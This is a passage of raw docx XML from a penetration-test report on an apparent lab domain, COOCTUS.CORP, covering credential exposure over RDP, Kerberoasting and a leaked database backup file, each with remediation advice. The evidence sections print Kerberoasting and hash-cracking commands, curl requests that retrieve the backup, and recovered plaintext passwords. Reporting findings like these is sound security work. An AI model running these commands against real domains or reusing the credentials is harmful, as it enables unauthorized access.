        <w:t>Credentials displayed pre-authentication are available to anyone who can reach the host over RDP, requiring zero exploitation skill. This single exposure was the pivot point for the entire domain compromise.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="150" w:after="70"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5AAC"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="264" w:before="0" w:after="70"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Never display credentials, hints, or sensitive information on lock screens, login backgrounds, or corporate desktop wallpapers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="264" w:before="0" w:after="70"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Enforce a clean-desk and secure-screen policy across the domain via Group Policy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="264" w:before="0" w:after="70"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Restrict RDP exposure to jump hosts only and require network-level authentication (NLA) plus MFA.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="264" w:before="0" w:after="70"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Rotate the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Visitor</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> account password immediately and review whether the account is needed at all.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="8" w:color="C7CEDA"/>
        </w:pBdr>
        <w:spacing w:before="0" w:after="160"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="90"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc234251554"/>
      <w:r>
        <w:rPr/>
        <w:t>Finding 3: Kerberoastable Service Account with Weak Password</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:jc w:val="start"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="30" w:type="dxa"/>
          <w:start w:w="0" w:type="dxa"/>
          <w:bottom w:w="30" w:type="dxa"/>
          <w:end w:w="60" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:noHBand="0" w:noVBand="0" w:firstColumn="0" w:lastRow="0" w:lastColumn="0" w:firstRow="0" w:val="0000"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1699"/>
        <w:gridCol w:w="2201"/>
        <w:gridCol w:w="5460"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1699" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:tbl>
            <w:tblPr>
              <w:tblW w:w="1500" w:type="dxa"/>
              <w:jc w:val="start"/>
              <w:tblInd w:w="0" w:type="dxa"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblCellMar>
                <w:top w:w="40" w:type="dxa"/>
                <w:start w:w="80" w:type="dxa"/>
                <w:bottom w:w="40" w:type="dxa"/>
                <w:end w:w="80" w:type="dxa"/>
              </w:tblCellMar>
              <w:tblLook w:noHBand="0" w:noVBand="0" w:firstColumn="0" w:lastRow="0" w:lastColumn="0" w:firstRow="0" w:val="0000"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="1500"/>
            </w:tblGrid>
            <w:tr>
              <w:trPr/>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1500" w:type="dxa"/>
                  <w:tcBorders/>
                  <w:shd w:color="auto" w:fill="B0341D" w:val="clear"/>
                </w:tcPr>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="Normal"/>
                    <w:jc w:val="center"/>
                    <w:rPr/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>HIGH</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2201" w:type="dxa"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:top w:w="70" w:type="dxa"/>
              <w:start w:w="110" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
              <w:end w:w="110" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="5B6472"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">CVSS 3.1: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>8.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5460" w:type="dxa"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:top w:w="70" w:type="dxa"/>
              <w:start w:w="110" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
              <w:end w:w="110" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="5B6472"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="150" w:after="70"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5AAC"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>password-reset</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> account had a registered SPN, making it Kerberoastable by any authenticated domain user. Its TGS-REP (etype 23 / RC4-HMAC) was requested and cracked offline in seconds against a standard wordlist, recovering the password </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>resetpassword</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. A weak, dictionary-based service-account password is what turned a low-privilege foothold into a path to the Critical delegation finding.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="150" w:after="70"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5AAC"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Evidence</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impacket-GetUserSPNs 'COOCTUS.CORP/Visitor:GuestLogin!' -dc-ip 10.64.148.30 -request</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="40"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7FB0FF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t># $krb5tgs$23$*password-reset$... (etype 23 -&gt; hashcat -m 13100)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E6E9F0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>hashcat -m 13100 kerb_hashes.txt rockyou.txt   # -&gt; resetpassword</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="5B6472"/>
        </w:rPr>
        <w:t>See Figures 11–12 in section 3.6 for the GetUserSPNs extraction and Hashcat crack.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="150" w:after="70"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5AAC"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Business Risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Any authenticated user - including a low-privilege or guest account - can request and crack service tickets offline. Weak service-account passwords remove the practical barrier to lateral movement and privilege escalation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="150" w:after="70"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5AAC"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="264" w:before="0" w:after="70"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Enforce a minimum 25–30 character password for all service accounts and disallow dictionary words.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="264" w:before="0" w:after="70"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Where possible, migrate service accounts to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Group Managed Service Accounts (gMSA)</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, which auto-rotate 120+ character passwords and defeat offline cracking.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="264" w:before="0" w:after="70"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Remove SPNs from accounts that do not require them, and disable RC4 (etype 23) in favor of AES where feasible.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="264" w:before="0" w:after="70"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Monitor for anomalous TGS requests (Event ID 4769) as a Kerberoasting detection signal.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="8" w:color="C7CEDA"/>
        </w:pBdr>
        <w:spacing w:before="0" w:after="160"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="90"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc234251555"/>
      <w:r>
        <w:rPr/>
        <w:t>Finding 4: Sensitive Information Disclosure via Web Backup File</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:jc w:val="start"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="30" w:type="dxa"/>
          <w:start w:w="0" w:type="dxa"/>
          <w:bottom w:w="30" w:type="dxa"/>
          <w:end w:w="60" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:noHBand="0" w:noVBand="0" w:firstColumn="0" w:lastRow="0" w:lastColumn="0" w:firstRow="0" w:val="0000"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1699"/>
        <w:gridCol w:w="2201"/>
        <w:gridCol w:w="5460"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1699" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:tbl>
            <w:tblPr>
              <w:tblW w:w="1500" w:type="dxa"/>
              <w:jc w:val="start"/>
              <w:tblInd w:w="0" w:type="dxa"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblCellMar>
                <w:top w:w="40" w:type="dxa"/>
                <w:start w:w="80" w:type="dxa"/>
                <w:bottom w:w="40" w:type="dxa"/>
                <w:end w:w="80" w:type="dxa"/>
              </w:tblCellMar>
              <w:tblLook w:noHBand="0" w:noVBand="0" w:firstColumn="0" w:lastRow="0" w:lastColumn="0" w:firstRow="0" w:val="0000"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="1500"/>
            </w:tblGrid>
            <w:tr>
              <w:trPr/>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1500" w:type="dxa"/>
                  <w:tcBorders/>
                  <w:shd w:color="auto" w:fill="B8860B" w:val="clear"/>
                </w:tcPr>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="Normal"/>
                    <w:jc w:val="center"/>
                    <w:rPr/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>MODERATE</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2201" w:type="dxa"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:top w:w="70" w:type="dxa"/>
              <w:start w:w="110" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
              <w:end w:w="110" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="5B6472"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">CVSS 3.1: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>5.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5460" w:type="dxa"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:top w:w="70" w:type="dxa"/>
              <w:start w:w="110" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
              <w:end w:w="110" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="5B6472"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="150" w:after="70"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5AAC"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>robots.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> file on the IIS web server disclosed the path to a backup file, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>/db-config.bak</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, which contained plaintext database credentials (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>C00ctusAdm1n / B4dt0th3b0n3</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>). While these credentials did not directly lead to domain compromise in this engagement, exposed backup files provide adversaries with easily harvested intelligence and are a common source of credential reuse.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="150" w:after="70"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5AAC"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Evidence</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:jc w:val="start"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="130" w:type="dxa"/>
          <w:start w:w="170" w:type="dxa"/>
          <w:bottom w:w="130" w:type="dxa"/>
          <w:end w:w="170" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:noHBand="0" w:noVBand="0" w:firstColumn="0" w:lastRow="0" w:lastColumn="0" w:firstRow="0" w:val="0000"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:tcBorders/>
            <w:shd w:color="auto" w:fill="1E2330" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="40"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E6E9F0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>curl -s http://10.64.148.30/robots.txt   # Disallow: /db-config.bak</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="40"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E6E9F0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>curl -s http://10.64.148.30/db-config.bak</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7FB0FF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t># DB_USER=C00ctusAdm1n  DB_PASS=B4dt0th3b0n3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="5B6472"/>
        </w:rPr>
        <w:t>See Figures 3–4 in section 3.2 for the robots.txt and db-config.bak disclosure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="150" w:after="70"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5AAC"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Business Risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Publicly reachable backup files expose credentials and configuration that can enable credential-stuffing, lateral movement, or direct database access. robots.txt should never be relied upon to hide sensitive paths - it advertises them.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="150" w:after="70"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5AAC"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="264" w:before="0" w:after="70"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Remove all </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>.bak</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>.old</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> backup files from web-accessible directories.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="264" w:before="0" w:after="70"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Do not store credentials in web-served configuration files; use a secrets manager or environment variables outside the web root.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="264" w:before="0" w:after="70"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Rotate the exposed database credentials and audit for any reuse across other systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="264" w:before="0" w:after="70"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Configure IIS request filtering to block access to backup and source file extensions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:pBdr>
